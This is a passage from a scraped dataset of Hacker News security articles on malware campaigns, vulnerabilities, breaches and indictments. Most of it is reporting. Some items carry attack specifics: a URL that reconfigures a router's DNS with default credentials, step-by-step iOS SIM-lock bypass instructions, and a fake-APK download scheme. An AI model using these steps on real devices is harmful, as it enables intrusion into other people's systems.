turn host more than 15,300 unique malware samples. The campaign — which impacts Microsoft Edge, Google Chrome, Yandex Browser, and Mozilla Firefox browsers on Windows — aims to insert additional, unauthorized ads on top of legitimate ads displayed on search engine results pages, leading users to click on these ads inadvertently. Microsoft said the persistent browser modifier malware has been observed since May this year, with over 30,000 devices affected every day at its peak in August. ""Cybercriminals abusing affiliate programs is not new—browser modifiers are some of the oldest types of threats,"" the Windows maker said. ""However, the fact that this campaign utilizes a piece of malware that affects multiple browsers is an indication of how this threat type continues to be increasingly sophisticated. In addition, the malware maintains persistence and exfiltrates website credentials, exposing affected devices to additional risks."" Once dropped and installed on target systems via drive-by downloads, Adrozek proceeds to make multiple changes to browser settings and security controls so as to install malicious add-ons that masquerade as genuine by repurposing the IDs of legitimate extensions. Although modern browsers have integrity checks to prevent tampering, the malware cleverly disables the feature, thus allowing the attackers to circumvent security defenses and exploit the extensions to fetch extra scripts from remote servers to inject bogus advertisements and gain revenue by driving traffic to these fraudulent ad pages. What's more, Adrozek goes one step further on Mozilla Firefox to carry out credential theft and exfiltrate the data to attacker-controlled servers. ""Adrozek shows that even threats that are not thought of as urgent or critical are increasingly becoming more complex,"" the researchers said. ""And while the malware's main goal is to inject ads and refer traffic to certain websites, the attack chain involves sophisticated behavior that allows attackers to gain a strong foothold on a device. The addition of credential theft behavior shows that attackers can expand their objectives to take advantage of the access they're able to gain. ",Malware Android Vulnerability Allows Applications to Make Unauthorized Calls without Permissions,https://thehackernews.com/2014/07/android-vulnerability-allows.html,"A major vulnerability believed to be present in most versions of Android can allow a malicious Android applications on the Android app store to make phone calls on a user's device, even when they lack the necessary permissions. The critical vulnerability was identified and reported to Google Inc. late last year by researchers from German security firm Curesec. The researchers believe the virus was first noticed in Android version 4.1, also known as ""Jelly Bean."" APPS CAN MAKE CALLS FROM YOUR PHONE ""This bug can be abused by a malicious application. Take a simple game which is coming with this code. The game won't ask you for extra permissions to do a phone call to a toll number – but it is able to do it,"" Curesec's CEO Marco Lux and researcher Pedro Umbelino said Friday in a blog post. ""This is normally not possible without giving the app this special permission."" By leveraging these vulnerabilities, malicious applications could initiate unauthorized phone calls, disrupt ongoing calls, dialing out to expensive toll services, potentially framing up big charges on unsuspecting users' phone bills. Android bug allows unauthorized users to terminate outgoing calls and Send USSD The vulnerability can also be exploited to disconnect the outgoing calls, to send and execute : Unstructured Supplementary Service Data (USSD) Supplementary Service (SS) Manufacturer-defined MMI (Man-Machine Interface) codes. These special codes can be used to access various device functions or operator services, which makes the problem a nasty one for those who value the data they store on their mobile phone. ""The list of USSD/SS/MMI codes is long and there are several quite powerful ones like changing the flow of phone calls (forwarding), blocking your SIM card, enabling or disabling caller anonymisation and so on,"" reads the blog post. Even the Android security programs, where apps without the CALL_PHONE permission should not be able to initiate phone calls, can be easily bypassed and offer no protection from these flaws, because the exploits have capability to deceive the Android permissions system altogether. ""As the app does not have the permission but is abusing a bug, such apps cannot easily protect you from this without the knowledge that this bug exists in another class on the system,"" wrote the researchers. A large number of versions of Android are affected by the vulnerabilities. Researchers have found two different flaws that can be exploited to achieve the same ends – one that's present in newer Android releases and another that's found in older versions. FIRST BUG - AFFECTS NEWER VERSION OF ANDROID The first security bug, identified as CVE-2013-6272, appears to be introduced in Android version 4.1.1 Jelly Bean, and outlasted all the way through 4.4.2 KitKat before the security team at Google was able to fixed it in Android 4.4.4. But, luckily only about 14% of users are currently updated to the latest version of the mobile Operating System. So, just think about it, How many users are currently in the grip of the flaws? Not less than a generous users open to vulnerabilities and attack paths. SECOND BUG - AFFECTS OLDER VERSION OF ANDROID The second security hole is wider in its reach, affecting both Android 2.3.3 and 2.3.6, the popular versions of Gingerbread variant which are used by lower-end smartphones, budget-style smartphones which continue to surge in popularity amongst emerging markets like those found in Brazil, China, and Russia. The bug was fixed in Android 3.0 Honeycomb, but that was a tablet-only release that no longer even charts on Google's Android statistics. That means the bugs leave nearly 90 percent of Android users running vulnerable versions of the Operating System to dialer-manipulating vulnerability. Researchers at Curesec have provided source code and a proof-of-concept demonstration app for both the bugs, so that customers can help themselves to test if their Android devices are vulnerable or not. It is strongly advised to Android users those are running KitKat on their devices to get upgraded to the latest version 4.4.4 as soon as possible. It is expected that the device makers and carriers will soon roll out the updates in the coming weeks. ",Vulnerability U.S. Charges 6 Russian Intelligence Officers Over Destructive Cyberattacks,https://thehackernews.com/2020/10/russian-hackers.html,"The US government on Monday formally charged six Russian intelligence officers for carrying out destructive malware attacks with an aim to disrupt and destabilize other nations and cause monetary losses. The individuals, who work for Unit 74455 of the Russian Main Intelligence Directorate (GRU), have been accused of perpetrating the ""most disruptive and destructive series of computer attacks ever attributed to a single group,"" according to the Justice Department (DoJ). All the six men — Yuriy Sergeyevich Andrienko, Sergey Vladimirovich Detistov, Pavel Valeryevich Frolov, Anatoliy Sergeyevich Kovalev, Artem Valeryevich Ochichenko, and Petr Nikolayevich Pliskin — have been charged with seven counts of conspiracy to conduct computer fraud and abuse, conspiracy to commit wire fraud, wire fraud, damaging protected computers, and aggravated identity theft. ""The object of the conspiracy was to deploy destructive malware and take other disruptive actions, for the strategic benefit of Russia, through unauthorized access ('hacking') of victim computers,"" the prosecutors said. ""In furtherance of the conspiracy, Andrienko, Detistov, Frolov, Kovalev, Ochichenko, Pliskin, and others known and unknown to the grand jury procured, maintained, and utilized servers, email accounts, malicious mobile applications, and related hacking infrastructure to engage in spear-phishing campaigns and other network intrusion methods against computers used by the victims."" Five years ago, Russian hackers belonging to Sandworm (aka APT28, Telebots, Voodoo Bear or Iron Viking) group attacked Ukraine's power grid, Ministry of Finance, and State Treasury Service using malware such as BlackEnergy, Industroyer, and KillDisk, before embarking on a spree of destructive cyberattacks — including unleashing NotPetya in 2017 and targeting the Pyeongchang Winter Olympics with phishing campaigns and ""Olympic Destroyer"" malware. The six individuals have been accused of developing components for NotPetya, Olympic Destroyer, KillDisk malware, as well as preparing spear-phishing campaigns directed against the 2018 PyeongChang Winter Olympic Games, resulting in damage and disruption to computer networks across France, Georgia, the Netherlands, Republic of Korea, Ukraine, the UK, and the US. ""For example, the NotPetya malware impaired Heritage Valley's provision of critical medical services to citizens of the Western District of Pennsylvania through its two hospitals, 60 offices, and 18 community satellite facilities,"" the DoJ said. ""The attack caused the unavailability of patient lists, patient history, physical examination files, and laboratory records."" ""Heritage Valley lost access to its mission-critical computer systems (such as those relating to cardiology, nuclear medicine, radiology, and surgery) for approximately one week and administrative computer systems for almost one month, thereby causing a threat to public health and safety,"" it added. The total damages brought about by NotPetya is pegged to more than $10 billion to date, crippling several multinational companies like Maersk, Merck, FedEx's TNT Express, Saint-Gobain, Mondelēz, and Reckitt Benckiser. In a similar development, the UK government also formally accused the GRU of perpetrating cyber reconnaissance against officials and organizations at the 2020 Tokyo Olympic and Paralympic Games earlier this summer before they were postponed next year due to COVID-19. This is not the first time GRU has come under the DoJ scanner. Two years back, the US government charged seven officers working for the military intelligence agency for conducting sophisticated computer intrusions against US entities as part of an influence and disinformation campaign designed to counter anti-doping efforts. ",Cyber_Attack Targeted Ransomware Attacks Hit Several Spanish Companies,https://thehackernews.com/2019/11/everis-spain-ransomware-attack.html,"Everis, one of the largest IT consulting companies in Spain, suffered a targeted ransomware attack on Monday, forcing the company to shut down all its computer systems until the issue gets resolved completely. Ransomware is a computer virus that encrypts files on an infected system until a ransom is paid. According to several local media, Everis informed its employees about the devastating widespread ransomware attack, saying: ""We are suffering a massive virus attack on the Everis network. Please keep the PCs off. The network has been disconnected with clients and between offices. We will keep you updated."" ""Please, urgently transfer the message directly to your teams and colleagues due to standard communication problems."" According to cybersecurity consultant Arnau Estebanell Castellví, the malware encrypted files on Everis's computers with an extension name resembling the company's name, i.e., "".3v3r1s,"" which suggests the attack was highly targeted. At this moment, it's unknown which specific ransomware family was used to target the company, but the attackers behind the attack reportedly demanded €750,000 (~USD 835,000) in ransom for the decryptor, a company insider informed bitcoin.es site. However, considering the highly targeted nature of the attack, the founder of VirusTotal in a tweet suggests the type of ransomware could be BitPaymer/IEncrypt, the same malware that was recently found exploiting a zero-day vulnerability in Apple's iTunes and iCloud software. Here's the ransomware message that was displayed on the screens of the infected computers across the company: Hi Everis, your network was hacked and encrypted. No free decryption software is available on the web. Email us at sydney.wiley@protonmail.com or evangelina.mathews@tutanota.com to get the ransom amount. Keep our contacts safe. Disclosure can lead to the impossibility of decryption. What's more? It seems like Everis is not the only company that suffered a ransomware attack this morning. Some other Spanish and European companies have reportedly also been hit by a similar ransomware malware during the same period, of which the national radio network La Cadena SER has confirmed the cyber attack. ""The SER chain has suffered this morning an attack of a computer virus of the ransomware type, file encrypter, which has had a serious and widespread affectation of all its computer systems,"" the company said. ""Following the protocol established in cyberattacks, the SER has seen the need to disconnect all its operating computer systems."" The company has also informed that its ""technicians are already working for the progressive recovery of the local programming of each of their stations."" At the time of writing, it's unclear if the hackers behind these ransomware attacks are the same, how the malware infiltrated the companies in the first place and did it contain wormable capabilities to successfully spread itself across the network. Though it's unconfirmed, some people familiar with the incident also suspect attackers might have used the BlueKeep RDP vulnerability to compromise the company's servers, whose first mass exploitation activity was spotted in the wild just yesterday in a separate campaign. The Hacker News is in contact with some of the targeted company's employees and will update you with more information about the incident shortly. Meanwhile, the Spanish Department of Homeland Security has also issued a warning about the ongoing cyber attack and recommended users to follow basic security practices like keeping their systems updated and having a proper backup of their important data. ",Cyber_Attack Microsoft Warns of New Unpatched Windows Print Spooler Vulnerability,https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html,"Microsoft on Thursday shared fresh guidance on yet another vulnerability affecting the Windows Print Spooler service, stating that it's working to address it in an upcoming security update. Tracked as CVE-2021-34481 (CVSS score: 7.8), the issue concerns a local privilege escalation flaw that could be abused to perform unauthorized actions on the system. The company credited security researcher Jacob Baines for discovering and reporting the bug. ""An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges,"" the Windows maker said in its advisory. ""An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."" However, it's worth pointing out that successful exploitation of the vulnerability requires the attacker to have the ability to execute code on a victim system. In other words, this vulnerability can only be exploited locally to gain elevated privileges on a device. As workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability. The development comes days after the Redmond-based firm rolled out patches to address a critical shortcoming in the same component that it disclosed as being actively exploited to stage in-the-wild attacks, making it the third printer-related flaw to come to light in recent weeks. Dubbed PrintNightmare (CVE-2021-34527), the vulnerability stems from a missing permission check in the Print Spooler that enables the installation of malicious print drivers to achieve remote code execution or local privilege escalation on vulnerable systems. However, it later emerged that the out-of-band security update could be entirely bypassed under specific conditions to gain both local privilege escalation and remote code execution. Microsoft has since said the fixes are ""working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare."" ",Vulnerability KRBanker Malware Targeting Korean Financial Institutions,https://thehackernews.com/2013/06/krbanker-malware-targeting-korean.html,"A recently discovered piece of malware called KRBanker (Korea + Banker = KRBanker) , targeting mostly online end-users at Korean financial institutions. According to nProtect, now an invasive banking Trojan, the new and improved KRBanker can block anti-virus software, security websites and even other malware in its quest to steal user information and share it with hackers. Then the malware pings back to the command and control (C&C) server with infection status and then the malware proceeds to download encrypted files on the victim's PC. In the latest variant of the KRBanker malware, scans the PC for lists of DLLs that are related to Korean financial institutions, security software and patches any opcode instructions. Malware instructed to insert the malicious code that will search and collect any information related to password, account details, and transaction history. Once logged, the compiled information is then sent to a remote server. KRBanker will also collect digital certificates in the PC's NPKI directory. These unique digital certificates used both by individuals and corporate are normally used for all financial purposes such as banking, credit card, insurance, and more. The hacker will collect digital certificates, password, account details, and screenshot information to gain fraudulent access to the victim's account. After discovering KRBanker, which is distributed worldwide but concentrated mainly in Korea, nProtect Online Security quickly update their antivirus solution to defend against this malware. ",Malware Another Facebook Quiz App Left 120 Million Users' Data Exposed,https://thehackernews.com/2018/06/facebook-users-data-leak.html,"People are still getting over the most controversial data scandal of the year, i.e., Cambridge Analytica scandal, and Facebook is under fire yet again after it emerges that a popular quiz app on the social media platform exposed the private data of up to 120 million users for years. Facebook was in controversies earlier this year over a quiz app that sold data of 87 million users to a political consultancy firm, who reportedly helped Donald Trump win the US presidency in 2016. Now, a different third-party quiz app, called NameTests, found exposing data of up to 120 million Facebook users to anyone who happened to find it, an ethical hacker revealed. NameTests[.]com, the website behind popular social quizzes, like ""Which Disney Princess Are You?"" that has around 120 million monthly users, uses Facebook's app platform to offer a fast way to sign up. Just like any other Facebook app, signing up on the NameTests website using their app allows the company to fetch necessary information about your profile from the Facebook, with consent naturally. However, Inti De Ceukelaire, a bug bounty hunter and hacker, found that the popular quiz website is leaking logged-in user's detail to the other websites opened in the same browser, allowing any malicious website to obtain that data easily. In a Medium post published yesterday, Ceukelaire said he liked to participate in the Data Abuse Bounty Program that Facebook recently launched in the wake of Cambridge Analytica scandal. So, he started looking at the apps his friends on Facebook had installed. Ceukelaire then decided to take his first quiz through the NameTests app, and as he started taking a closer look on the test process, he noticed that the website was fetching his personal information from ""https://nametests[.]com/appconfig_user"" and display it on its website. Ceukelaire was shocked when he saw his personal data in a JavaScript file that could easily be accessed by virtually any website when they would request it. What Was the Flaw? How It Leaked Users' Data? This issue was due to a simple yet severe flaw in NameTests website that appears to have existed since the end of 2016. Storing user data in JavaScript file caused the website to leak data to other websites, which is otherwise not possible due to browser's Cross-Origin Resource Sharing (CORS) policy that prevents a website from reading the content of other websites without their explicit permission. As a proof of concept, Ceukelaire developed a malicious website that would connect to NameTests to mine the data of visitors using the app. Using a simple bit of code, he was able to harvest the names, photos, posts, pictures, and friends lists of anyone taking part in the quiz. The vigilant hacker also made a video as a proof of his findings, demonstrating how the NameTests website revealed your personal data even after deleting the app. Ceukelaire reported the flaw via Facebook's Data Abuse Bounty Program on April 22, and over a month later the social media informed him that it could take three to six months to investigate the issue. Over two months after initially reporting the issue to Facebook, Ceukelaire noticed that NameTests has fixed the issue, and told him it had found no evidence of abuse of the exposed data by any third party. On 27th June, Facebook contacted Ceukelaire and informed him that NameTests had fixed the issue, and at his request, donated $8,000 to the Freedom of the Press Foundation as part of its Data Abuse Bounty Program. German company Social Sweethearts, who is behind NameTests, claims to have more than 250 million registered users and have reached more than 3 billion page views per month. The latest incident shows that, even after the social media giant changed its conditions for apps to access data on its platform back in 2015, Facebook failed to adequately police such apps that have access to substantial amounts of personal data on its platform. ",Data_Breaches WhatsApp vulnerability can be misused for Spreading Malware,https://thehackernews.com/2012/09/whatsapp-vulnerability-can-be-misused.html,"A Cross site scripting (XSS) vulnerability in WhatsApp website reported to The Hacker News by Edgard Chammas. WhatsApp is one of the most famous cross-platform mobile messaging app for iPhone, BlackBerry, Android, Windows Phone and Nokia used to send text, video, images, audio b/w Whatsapp users. Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. Reported vulnerability exist on payment procedure page as shown in above picture. The Sample code given below to demonstrate the vulnerability. Recently, there has been an increase in web malware and spam activities and such vulnerabilities can be misused by attackers to spread Malwares and rogue applications. Edgard also demonstrate that How this can be used to trick users to download a fake application (Malware - WhatsApp.apk) from other any evil domain (www.evilwebsite/WhatsApp.apk). in below given example, attacker just using a pop-up window to open fake application download link. While the official binary is here https://www.whatsapp.com/android/current/WhatsApp.apk According to reports in 2012 mobile malwares are 50 times increases than previous ever. We request Whatsapp team to fix the vulnerability as soon as possible. ",Vulnerability New XSS Vulnerability found on Sony PlayStation by c7-elixir - The C7 Crew,https://thehackernews.com/2011/06/new-xss-vulnerability-found-on-sony.html,"New XSS Vulnerability found on Sony PlayStation by c7-elixir - The C7 Crew YES ! Sony is still Vulnerable to various bugs like XSS. Today a hacker c7-elixir from The C7 Crew has expose new XSS attack on Sony PlayStation's Website as shown. Sony got hacked 20 times in last two months by number of hackers from all over world. One more REQUEST to Sony : FIX IT BOSS ! Vulnerable Link ",Vulnerability iPhone iOS 7.0.2 Sim Lock Screen Bypass vulnerability,https://thehackernews.com/2013/10/iphone-ios-702-sim-lock-screen-bypass_8.html,"If you're unlucky enough to lose your Smartphone or have it stolen, anyone who finds the device will also be able to access any content stored on the device, whether its contacts, music or documents. But by implementing a SIM card PIN lock, everytime the device is powered down and subsequently switch back on again, the PIN will need to enter before the phone can be used. Security Researcher - Benjamin Kunz Mejri from Vulnerability Laboratory claimed that he found a new vulnerability in the iOS v7.0.1 & v7.0.2, that allows a hacker to bypass the Sim lock Mode. In a Proof of Concept video, he demonstrates that how an attacker can bypass the restricted section of the iPhone, when Sim Lock is enabled on a Stolen iPhone Device. Flaw can be exploited without user interaction and successful exploitation results in the bypass of the SIM lock mode to the regular lock mode. Follow Steps to bypass SIM Lock on stolen Devices: Turn on your iPhone and ensure you have the iOS v7.0.1 or 7.0.2 installed and Sim Lock mode is activated. You will see a black notification in the middle of the display - SIM Locked. Open the Calendar, and scroll down to the two hyperlinks. Press the Power button and wait 2 seconds and then press one of the two hyperlinks. You will be redirected via hyperlink, because of the restriction to the passcode SIM lock. Press Power button again for 3 seconds and then press the Home button Click cancel again in the shutdown menu but hold the Home button. Open up the Control center and go to the calculator. Now a message box appears automatically with the SIM lock Press the shutdown button for 3 seconds + Unlock Key + Home button. The Passcode screen will pop up, but you will be again redirected to Calculator. Now again press the Power button for 3 seconds the and then press Cancel, at last press the Home button one time. The Restricted Sim Lock Screen will disappear. This flaw does not cover Regular Passcode bypass. For that attacker need to use other ways. Shortly after the iOS 7 release date earlier this month, users discovered a lock screen flaw that allowed users to use a simple exploit in order to view private details on the iPhone, iPad or iPod touch. Apple worked quickly to fix the issue and rolled out iOS 7.0.2, an update aimed at adding Greek keyboard support and tackling the lock screen security flaw. But Just after that another Screen Lock Bypass bug appeared on the Internet. The growing number of iOS 7.0.2 problems are now frustrating iPhone and iPad users. ",Vulnerability "Hacking Millions with Just an Image — Recipe: Pixels, Ads & Exploit Kit",https://thehackernews.com/2016/12/image-exploit-hacking.html,"If you have visited any popular mainstream website over the past two months, your computer may have been infected — Thanks to a new exploit kit discovered by security researchers. Researchers from antivirus provider ESET released a report on Tuesday stating that they have discovered an exploit kit, dubbed Stegano, hiding malicious code in the pixels of banner advertisements that are currently in rotation on several high profile news websites. Stegano originally dates back to 2014, but since early October this year, cyber crooks had managed to get the malicious ads displayed on a variety of unnamed reputable news websites, each with Millions of daily visitors. Stegano derived from the word Steganography, which is a technique of hiding messages and content inside a digital graphic image, making the content impossible to spot with the naked eye. In this particular malvertising campaign, operators hide malicious code inside transparent PNG image's Alpha Channel, which defines the transparency of each pixel, by altering the transparency value of several pixels. The malvertising campaign operators then packed the altered image as an advertisement and managed to display those malicious ads on several high-profile websites. According to the researchers, the malicious ads promote applications called ""Browser Defense"" and ""Broxu,"" and the methodology makes it tough for ad networks to detect. Here's How the Stegano Attack Works: Once a user visits a site hosting malicious advertisement, the malicious script embedded in the ad reports information about the victim's computer to the attacker's remote server without any user interaction. The malicious code then uses the CVE-2016-0162 vulnerability in Microsoft's Internet Explorer (IE) browser in order to scan the target computer to see if it is running on a malware analyst's machine. After verifying the targeted browser, the malicious script redirects the browser to a website that hosts Flash Player exploits for three now-patched Adobe Flash vulnerabilities: CVE-2015-8651, CVE-2016-1019, and CVE-2016-4117. ""Upon successful exploitation, the executed shell code collects information on installed security products and performs – as paranoid as the cybercriminals behind this attack – yet another check to verify that it is not being monitored,"" ESET researchers wrote in a blog post. ""If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image."" When downloaded to the victim's computer, the encrypted payload is then decrypted and launched via regsvr32.exe or rundll32.exe in Microsoft Windows. Just Visit a Site, and You'll be Hacked in Just 2-3 Sec Below is an ESET infographic that explains the working of Stegano's exploit attack: All the above operations execute automatically without any user interactions and takes place in the span of just 2-3 seconds. So far, the Stegano exploit kit has pushed various trojan downloaders, the Ursnif and Ramnit banking trojans, backdoors, spyware, and file stealers. The Stegano exploit kit was initially used in 2014 to target people in the Netherlands, and then in 2015, moved on to residents in the Czech Republic. The latest attack campaign is targeting people in Canada, the UK, Australia, Spain, and Italy. The best way to protect yourself against any malvertising campaign is always to make sure you are running updated software and apps. Also use reputed antivirus software that can detect such threats before they infect your system. ",Malware Hook Analyser Malware Tool Released,https://thehackernews.com/2011/09/hook-analyser-malware-tool-released.html,"Hook Analyser Malware Tool Released Hook analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. The tool can hook to an API in a process and can do following tasks. 1. Hook to API in a process 2. Hook to API and search for pattern in memory of a process 3. Hook to API and dump buffer (memory). Download Here ",Malware WordPress Pingback Vulnerability Serves DDoS attack feature,https://thehackernews.com/2012/12/wordpress-pingback-vulnerability-serves.html,"Accunetix a web application security company reported vulnerabilities found in the Wordpress Pingback feature. According to report, Pingback vulnerability exists in the WordPress blogging platform that could leak information and lead to distributed denial of service (DDoS) attacks. ""WordPress has an XMLRPC API that can be accessed through the xmlrpc.php file. When WordPress is processing pingbacks, it's trying to resolve the source URL, and if successful, will make a request to that URL and inspect the response for a link to a certain WordPress blog post. If it finds such a link, it will post a comment on this blog post announcing that somebody mentioned this blog post in their blog."" Bogdan Calin explained. Pingback is one of three types of linkbacks, methods for Web authors to request notification when somebody links to one of their documents. This enables authors to keep track of who is linking to, or referring to their articles. Some weblog software, such as Movable Type, Serendipity, WordPress, and Telligent Community, support automatic pingbacks where all the links in a published article can be pinged when the article is published. A new tool has been released that automates the pingback vulnerability autonomously, distributed on the software development site Github as ""WordpressPingbackPortScanner"" . That tool exposes the API and lets attackers scan other hosts, multiple WordPress blogs and with a specialized URL, reconfigure routers. Tool description - ""Wordpress exposes a so called Pingback API to link to other blogposts. Using this feature you can scan other hosts on the intra- or internet via this server. You can also use this feature for some kind of distributed port scanning: You can scan a single host using multiple Wordpress Blogs exposing this API."" The bug is already reported on Wordpress community, but Softpedia notice that the ticket was closed at the time after someone argued that ""there are so many ways to orchestrate a DDOS attack."" All the wordpress blogs are at risk,can be heavily abused by attackers. Since the Wordpress also supports URL credentials , the attacker can use a link like https://admin:admin@192.168.0.1/changeDNS.asp?newDNS=aaaa to reconfigure internal routers. He also says that disabling the Pingback feature won't fix the solution ,the ultimate solution is a patch. ",Vulnerability Experian Breach: 15 Million T-Mobile Customers' Data Hacked,https://thehackernews.com/2015/10/experian-tmobile-hack.html,"If you applied for financing from T-Mobile anytime between 1 September 2013 and 16 September 2015, you have been HACKED! – even if you never had T-Mobile service. T-Mobile's credit application processor Experian was hacked, potentially exposing the highly personal information of more than 15 million people in the United States. The stolen information includes names, addresses, phone numbers and – most unfortunately – Social Security numbers. The massive data breach was first discovered in mid-September and has now been confirmed by T-Mobile CEO John Legere. According to Legere, Hackers successfully obtained Millions of people's private information through Experian, one of the world's largest credit check companies that process T-Mobile's credit applications. Both customers and people who submitted to a T-Mobile credit check (but either canceled or never activated their T-Mobile service) between September 1, 2013, and September 16, 2015, are most at risk. Now, Hackers have their hands on two years worth of sensitive identifying information that T-Mobile uses to check credit ratings, which could possibly make the rounds on the black market. The Stolen victims' data includes: Residential addresses Social Security numbers Birth Dates Driver's License number Passport number Military I.D. numbers and more Some of the pilfered data was encrypted, according to Experian, which is taking responsibility for the breach. However, T-Mobile claims that the ""encryption may have been compromised."" The telecommunication giant said that no credit or debit card numbers of its customers were stolen in the breach. However, one could imagine that with this trove of stolen data, anyone can easily steal someone's identity without trying too terribly hard. Why Losing a Social Security Number is more dangerous than Losing a Payment Card? It sounds good to ears hearing that hackers did not access credit or debit card numbers during the data breach, but losing your Social Security number is actually worse than losing your payment cards. If hackers make use of your credit or debit card, you have a good option to stop them – Report fraudulent purchases when you see your bill. You hardly lose anything, as you'll get your money back as well as your financial institution will send you a new payment card. But once your Social Security number stolen, Hackers can screw you up because, you can almost never change your Social Security number. Identity thieves can apply for credit cards and run up debt in your name. They can ruin your credit score, even before you come to know that your information is stolen and is misused. The more worrisome part is that there's not a whole lot victims can do to prevent further damage beyond one thing: Freeze your credit report. This incident marks the latest high-profile data breach and adds itself to the list that includes OPM losing 4 million federal workers' personal data, health insurer Excellus losing 10 million health records exposed and last year's Target and Home Depot data breach. T-Mobile is very Angry Legere said he is reviewing T-Mobile's relationship with the company as a result of the massive breach. ""Obviously I am incredibly angry about this data breach, and we will institute a thorough review of our relationship with Experian, but right now my top concern and first focus is assisting any and all consumers affected."" T-Mobile and Experian are offering two years of free credit monitoring to their affected customers. Now, let's wait and watch how worse this hack goes. ",Data_Breaches Popular Malware Families Using 'Process Doppelgänging' to Evade Detection,https://thehackernews.com/2019/07/process-doppelganging-malware.html,"The fileless code injection technique called Process Doppelgänging is actively being used by not just one or two but a large number of malware families in the wild, a new report shared with The Hacker News revealed. Discovered in late 2017, Process Doppelgänging is a fileless variation of Process Injection technique that takes advantage of a built-in Windows function to evade detection and works on all modern versions of Microsoft Windows operating system. Process Doppelgänging attack works by utilizing a Windows feature called Transactional NTFS (TxF) to launch a malicious process by replacing the memory of a legitimate process, tricking process monitoring tools and antivirus into believing that the legitimate process is running. Few months after the disclosure of this technique, a variant of the SynAck ransomware became the first-ever malware exploiting the Process Doppelgänging technique, targeting users in the United States, Kuwait, Germany, and Iran. Shortly after that, researchers discovered a dropper (loader) for the Osiris banking trojan that was also using this technique in combination with a previously discovered similar malware evasion technique called Process Hollowing. Now, turns out that it was not just SynAck or Osiris, but more than 20 different malware families—including FormBook, LokiBot, SmokeLoader, AZORult, NetWire, njRat, Pony stealer, and GandCrab ransomware—have been using malware loaders that leverage this hybrid implementation of Process Doppelgänging attack to evade detection. After analysing hundreds of malware samples, security researchers at enSilo discovered at least seven distinct versions of such loader, which they dubbed ""TxHollower,"" used by various malware authors. ""Attackers are known to reuse resources and tools in their attack chains, most notable are droppers, packers, and loaders. It highlights that shared components and code make tracking and attributing various groups even more complicated,"" researchers said. Researchers believe TxHollower loaders are available to cybercriminals through some offensive framework or exploit kit, eventually increasing the use of process doppelgänging-like techniques in-the-wild. The earliest sample of the loader with TxHollower feature was used in March 2018 to distribute Netwire RAT, and then later also found bundled with multiple GandCrab versions, starting with v5 and going all the way to v5.2. Besides this, researchers at enSilo also found a few samples wrapped in an additional layer such as MSI files and in some cases, loaders were nested with each other. ""While we didn't observe the actual infections, we were able to find a few samples we suspect to be related to the infection chain like downloaders and droppers of TxHollower. The type of files include PE executables, JavaScript and documents,"" the researchers said. To learn more about how the Process Doppelgänging attack technique works, you can read the previous article we published in 2017, and if you want to know more about various versions of TxHollower loader, you can head straight on to enSilo blog post published today. ",Malware Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild,https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html,"Cyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous public disclosures of their attack methods, according to a new advisory jointly published by intelligence agencies from the U.K. and U.S. Friday. ""SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,"" the National Cyber Security Centre (NCSC) said. These include the deployment of an open-source tool called Sliver to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities. The development follows the public attribution of SVR-linked actors to the SolarWinds supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities. CVE-2018-13379 - Fortinet FortiGate VPN CVE-2019-9670 - Synacor Zimbra Collaboration Suite CVE-2019-11510 - Pulse Secure Pulse Connect Secure VPN CVE-2019-19781 - Citrix Application Delivery Controller and Gateway CVE-2020-4006 - VMware Workspace ONE Access ""The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example COVID-19 vaccine targeting in 2020,"" the NCSC said. This was followed by a separate guidance on April 26 that shed more light on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development. Now according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to ""rapidly"" weaponize recently released public vulnerabilities that could enable initial access to their targets. CVE-2019-1653 - Cisco Small Business RV320 and RV325 Routers CVE-2019-2725 - Oracle WebLogic Server CVE-2019-7609 - Kibana CVE-2020-5902 - F5 Big-IP CVE-2020-14882 - Oracle WebLogic Server CVE-2021-21972 - VMware vSphere CVE-2021-26855 - Microsoft Exchange Server ""Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,"" the agency said. ",Vulnerability 'DeathRing' Chinese Malware Found Pre-Installed On Several Smartphones,https://thehackernews.com/2014/12/Mobile-Malware-Security.html,"Malware authors are trying hard to create malicious software with more innovative ways to infect victims. A new mobile Trojan horse infection has been discovered by security researchers that comes pre-loaded onto low-cost Chinese-made Android smartphones popular in Asia and Africa. The trojan, dubbed DeathRing, is a Chinese Trojan that masquerades as a ringtone app and comes pre-installed onto some cheap Android smartphones most popular in Asian and African countries including Vietnam, Indonesia, India, Nigeria, Taiwan, and China. DeathRing malware app cannot be uninstalled or removed by the end user or by antimalware software because it comes pre-installed in the system directory of the handsets at an unknown point within the supply chain, making the threat even more severe. WHAT DOES DEATHRING DO? Though the malware pretends to be a genuine ringtone app, but actually downloads SMS and WAP content from its command-and-control server to the victim's handset, which gives it potential to phish user's sensitive data through fake text messages. ""DeathRing might use SMS content to phish victim's personal information by fake text messages requesting the desired data,"" the security firm LookOut wrote in a blog post. ""It may also use WAP, or browser, content to prompt victims to download further APKs - 